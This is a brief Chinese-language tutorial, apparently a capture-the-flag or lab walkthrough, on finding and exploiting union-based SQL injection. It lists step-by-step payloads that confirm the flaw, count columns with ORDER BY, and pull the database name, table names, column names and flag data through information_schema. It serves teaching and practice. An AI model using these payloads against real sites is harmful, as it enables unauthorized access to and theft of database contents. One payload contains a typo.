手把手教你挖显错注入
and 1=2 页面返回错误 证明存在SQL注入
2.判断字段长度 order by 3 1到3有页面返回正常
order by 4 页面返回错误 证明存在3个字段
3.通过联合查询判断输出点 union select 1,2,3 根据页面回显2,3存在注入点
4.查数据库名 union select 1,2,database() 通过页面回显查出数据库名orror
5.查表名 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1
6.查字段 union select 1,2,column_name from information_schema.columns where table_schrma=database() and table_name='error_flag' limit 0,1
7.查数据 union select 1,id,flag from error_flag limit 0,1
